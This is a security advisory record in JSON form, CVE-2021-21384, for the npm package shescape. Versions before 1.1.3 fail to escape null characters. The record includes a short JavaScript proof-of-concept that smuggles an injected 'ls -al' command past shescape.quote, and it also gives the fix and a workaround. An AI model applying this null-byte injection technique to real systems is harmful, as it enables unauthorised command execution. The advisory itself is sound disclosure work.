{"id":"GHSA-f2rp-38vg-j3gh","summary":"Null characters not escaped","details":"### Impact\n\nAnyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows):\n\n```javascript\nconst cp = require(\"child_process\");\nconst shescape = require(\"shescape\");\n\nconst nullChar = String.fromCharCode(0);\nconst payload = \"foo\\\" && ls -al ${nullChar} && echo \\\"bar\";\nconsole.log(cp.execSync(`echo ${shescape.quote(payload)}`));\n// foototal 3\n// drwxr-xr-x 1 owner XXXXXX      0 Mar 13 18:44 .\n// drwxr-xr-x 1 owner XXXXXX      0 Mar 13 00:09 ..\n// drwxr-xr-x 1 owner XXXXXX      0 Mar 13 18:42 folder                                                                 \n// -rw-r--r-- 1 owner XXXXXX      0 Mar 13 18:42 file\n```\n\n### Patches\n\nThe problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required.\n\n### Workarounds\n\nAlternatively, null characters can be stripped out manually using e.g. `arg.replace(/\\u{0}/gu, \"\")`","aliases":["CVE-2021-21384"],"modified":"2026-05-07T05:03:00.051095268Z","published":"2021-03-18T23:47:56Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2021-03-18T23:43:39Z","nvd_published_at":"2021-03-19T00:15:00Z","cwe_ids":["CWE-88"]},"references":[{"type":"WEB","url":"https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-21384"},{"type":"WEB","url":"https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b"},{"type":"WEB","url":"https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3"},{"type":"WEB","url":"https://www.npmjs.com/package/shescape"}],"affected":[{"package":{"name":"shescape","ecosystem":"npm","purl":"pkg:npm/shescape"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.1.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-f2rp-38vg-j3gh/GHSA-f2rp-38vg-j3gh.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N"}]}